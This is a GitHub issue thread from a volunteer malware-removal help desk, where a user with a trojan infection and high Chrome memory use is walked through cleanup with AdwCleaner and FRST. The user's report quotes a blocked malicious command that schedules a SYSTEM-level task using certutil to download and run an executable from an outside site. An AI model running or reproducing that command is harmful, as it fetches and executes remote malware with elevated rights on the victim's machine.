### ISSUE TITLE
A malware is causing Google Chrome to use extra memory

### ISSUE THREAD

**Issue by minhngoc25a** [dragokas/hijackthis#118]
Welcome!
Thank you for joining the section of VIRUSNET association support.
_________________________________________________________________
### BEFORE ASKING HELP, READ CAREFULLY THIS INSTRUCTION:
_________________________________________________________________

### Step 1: Are you in the right place?

  * Do you need assistance in PC cure from viruses? Yes
  * Or would you like to report a bug or propose a feature for HiJackThis?

If yes, see the next step.

### Step 2: Show us the required logs (for PC cure):

  * Read carefully: [How to make a request for help in the PC cure section](https://github.com/dragokas/hijackthis/wiki/How-to-make-a-request-for-help-in-the-PC-cure-section%3F)

  * Attach 'Collection-[Date].zip' log created by [AutoLogger](http://tools.safezone.cc/drongo/test/AutoLogger-test.zip)

  * Describe your problem in details:

1. What did you do before the problem occurs: I launched a virus with non-admin permission
2. What programs (browsers) affected by the problem: Chrome
3. Steps to reproduce: According to Windows Defender, it stopped the program from running this command: `C:\Windows\System32\schtasks.exe /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR cmd.exe /C certutil.exe -urlcache -split -f https://thebabsite.com/app/app.exe C:\Users\Tran Bich Dung\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Tran Bich Dung\AppData\Local\Temp\csrss\scheduled.exe /31340 /TN ScheduledUpdate /F` and the type of virus is `Trojan:Win32/Ceprolad.A`.

When I use Adwcleaner and Malwarebytes to clean the adware, they would delete the local app data of Chrome, mainly `.db` files. Before my PC was infected by the virus, Chrome took up to 600-700MB of memory. But after that, Chrome would sometimes take up to 1400 MB of memory, and it would also launch some weird conhost as a child process.  This is my AutoLogger log: 

[CollectionLog-2020.11.23-23.59.zip](https://github.com/dragokas/hijackthis/files/5584558/CollectionLog-2020.11.23-23.59.zip)

Thank you for any help!

**Comment by dragokas** [comment]
Hi, 
thank you for the log.
We'll return to you as soon as possible.

----------------------------------------------------------------------------------------------------
**Please, note that only members of [VIRUSNET-Association](https://github.com/VIRUSNET-Association) are allowed to respond to PC cure topics. 
Ignore any recommendations given by other users, including PM !!!**

**Assistance is provided free of charge in our free time. If you found our help useful, you can thank us with any amount using [this form](https://safezone.cc/donate/) or you can leave feedback in [Guestbook](https://github.com/dragokas/hijackthis/issues/47).**

**Comment by Sandor-Helper** [comment]
Hi,

1. Uninstall PUPs via Control Panel:

> Defraggler
> IObit Driver Booster 8.0.0.92
> IObit Software Updater
> IObit Uninstaller

2. 
Download [AdwCleaner (by Malwarebytes)](https://toolslib.net/downloads/viewdownload/1-adwcleaner/) and save it to **Desktop**.
Run (it should be run by right-clicking **as Administrator**), press **"Scan"** and wait.
At the end of the scan log will be found at: 
**C:\AdwCleaner\Logs\AdwCleaner[Sxx].txt** (where **x** is any digit).
Attach it to your next post here.

**Comment by minhngoc25a** [comment]
Hey, thanks for responding. I have removed all of those programs and then restarted the computer.
Here is the log: 
[AdwCleaner[S03].txt](https://github.com/dragokas/hijackthis/files/5595234/AdwCleaner.S03.txt)
Thank you!

**Comment by Sandor-Helper** [comment]
Preinstalled Software just leave unchecked, other detections should be cleaned:
1.
Run again [AdwCleaner (by Malwarebytes)](https://toolslib.net/downloads/viewdownload/1-adwcleaner/) (it should be run by right-clicking **as Administrator**).
Go to Settings and switch on:
> Reset IE policies
> Reset Chrome policies

Go to Dashboard, press **Scan** and after scan ends press **Quarantine**.
System should be restarted.
After restart log will be found at: 
**C:\AdwCleaner\Logs\AdwCleaner[Cxx].txt** (where **x** is any digit).
Attach it to your next post here.

2.
Please download [Farbar Recovery Scan Tool](https://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/) and save it to your Desktop.

**Note**: You need to run the version compatible with your system. If you are not sure which version applies to your system download both of them and try to run them. Only one of them will run on your system, that will be the right version.

- Right click to run as administrator. When the tool opens click **Yes** to disclaimer.
- Press **Scan** button.
- It will produce logs called **FRST.txt** and **Addition.txt** in the same directory the tool is run from.
- Please attach the logs back here.

**Comment by minhngoc25a** [comment]
Hey,
Here is my [Addition.txt](https://github.com/dragokas/hijackthis/files/5595619/Addition.txt) and [FRST.txt](https://github.com/dragokas/hijackthis/files/5595621/FRST.txt).
Thanks.

Edit: Oops I forgot this: 
[AdwCleaner[S04].txt](https://github.com/dragokas/hijackthis/files/5595633/AdwCleaner.S04.txt)

**Comment by Sandor-Helper** [comment]
> forgot this:
> [AdwCleaner[S04].txt](https://github.com/dragokas/hijackthis/files/5595633/AdwCleaner.S04.txt)

Letters S and C are different, right? :) 
Log needed is AdwCleaner[**C**xx].txt

Temporarily turn off any antivirus.
Highlight following code:

```
Start::
CreateRestorePoint:
Task: {A0DD63E7-5EFF-45EA-9E82-A075725BD471} - System32\Tasks\Driver Booster SkipUAC (Tran Bich Dung) => C:\Program Files (x86)\IObit\Driver Booster\DriverBooster.exe
CHR StartupUrls: Default -> "hxxps://www.google.com/","hxxps://www.google.com/","hxxps://www.google.com/","hxxps://www.google.com/","hxxps://www.google.com/"
2020-11-25 15:08 - 2020-05-02 11:14 - 000000000 ____D C:\Program Files (x86)\IObit
2020-11-25 15:08 - 2019-03-24 16:19 - 000000000 ____D C:\ProgramData\IObit
ShellExecuteHooks-x32: No Name - {D2BF470E-ED1C-487F-AAAA-2BD8835EB6CE} -  -> No File
FirewallRules: [{3D3734FA-1D88-4A1C-A5D2-F1D69164B1FC}] => (Allow) LPort=8989
FirewallRules: [TCP Query User{7D02C805-2EAF-4FE1-B06C-DFAA99D71A0A}C:\program files\bitcoin\bitcoin-qt.exe] => (Allow) C:\program files\bitcoin\bitcoin-qt.exe => No File
FirewallRules: [UDP Query User{2A7BD7B4-314A-4849-9D76-6A3AB83AC594}C:\program files\bitcoin\bitcoin-qt.exe] => (Allow) C:\program files\bitcoin\bitcoin-qt.exe => No File
EmptyTemp:
Reboot:
End::
```


Copy highlighted text (right click - Copy).
Run FRST (FRST64) as Administrator.
Press **Fix** button once and wait. Program will create (Fixlog.txt). Attach it to the next post.

PC will reboot.

**Comment by minhngoc25a** [comment]
Oops, here's the log file for AdwCleaner: 
[AdwCleaner[C04].txt](https://github.com/dragokas/hijackthis/files/5595725/AdwCleaner.C04.txt)

I'm going to run FRST now.

**Comment by minhngoc25a** [comment]
I got the fixlog.txt here:
[Fixlog.txt](https://github.com/dragokas/hijackthis/files/5595779/Fixlog.txt)

**Comment by Sandor-Helper** [comment]
Ok. Is problem persists?

**Comment by minhngoc25a** [comment]
Chrome is using 400 MB of memory right now, I have no clue. Thanks for helping! I think I will give it a few days and see if some weird thing happen.

**Comment by Sandor-Helper** [comment]
You have to know that every tab and extension in Chrome uses its own process (and memory), so its value may differ.
Ok, watch it and while you're watching do final steps:
1. Run AdwCleaner again, scroll down and press Remove.
2. Rename FRST64.exe to uninstall.exe and run. PC will reboot.

**Comment by minhngoc25a** [comment]
Hey, thanks for helping, I guess it worked. But I think FRST64 deleted my Microsoft Store app and now I cannot launch it.

**Comment by minhngoc25a** [comment]
Chrome now uses nearly 1000 MB of memory.
![image](https://user-images.githubusercontent.com/33834488/100243450-76baf400-2f68-11eb-83a0-8c27a9d0d4f9.png)

**Comment by Sandor-Helper** [comment]
While Chrome window is active press simultaneously Shift+Esc, you'll see Chrome's own Task manager. Try to find out which process is more heavy.

**Comment by Sandor-Helper** [comment]
> deleted my Microsoft Store app

Which one?

**Comment by minhngoc25a** [comment]
> > deleted my Microsoft Store app
> 
> Which one?

It is the store itself. I cannot even launch it: https://youtu.be/GDxR1R1qAmo
And I tried every solution possible, from launching Windows Store app troubleshooting to launching Powershell commands of experts from support.microsoft.com, all of those do not work.

**Comment by minhngoc25a** [comment]
> While Chrome window is active press simultaneously Shift+Esc, you'll see Chrome's own Task Manager. Try to find out which process is more heavy.

Apparently, that's Chrome memory leak issue that has been happening for years. I thought it was the malware that caused that., so I think we don't need to fix Chrome anymore.

**Comment by Sandor-Helper** [comment]
Did you try [this advise](https://support.microsoft.com/en-us/account-billing/microsoft-store-doesn-t-launch-126a875d-8b72-def1-0af6-d325276a058b#:~:text=If%20you're%20having%20trouble,Windows%20Update%20%3E%20Check%20for%20Updates.) also?

**Comment by minhngoc25a** [comment]
Hey, so I figured it out myself. Looks like your tool messed up the Registry files so I found a solution here: https://answers.microsoft.com/en-us/windows/forum/windows_10-windows_store/microsoft-store-download-issues-fixed/bebfb651-4e04-4b16-9af8-4477b43e52ea

And the method is here, method 2: https://www.wintips.org/fix-windows-10-update-service-is-missing/#method-2

So, thanks for helping.

**Comment by Sandor-Helper** [comment]
Great!
Final recommendations:
Run AdwCleaner, scroll down and press Remove button.

Rename FRST64.exe to uninstall,exe and run it, PC will reboot. Other tools could be simply deleted.

**Comment by minhngoc25a** [comment]
OK, thanks a lot.
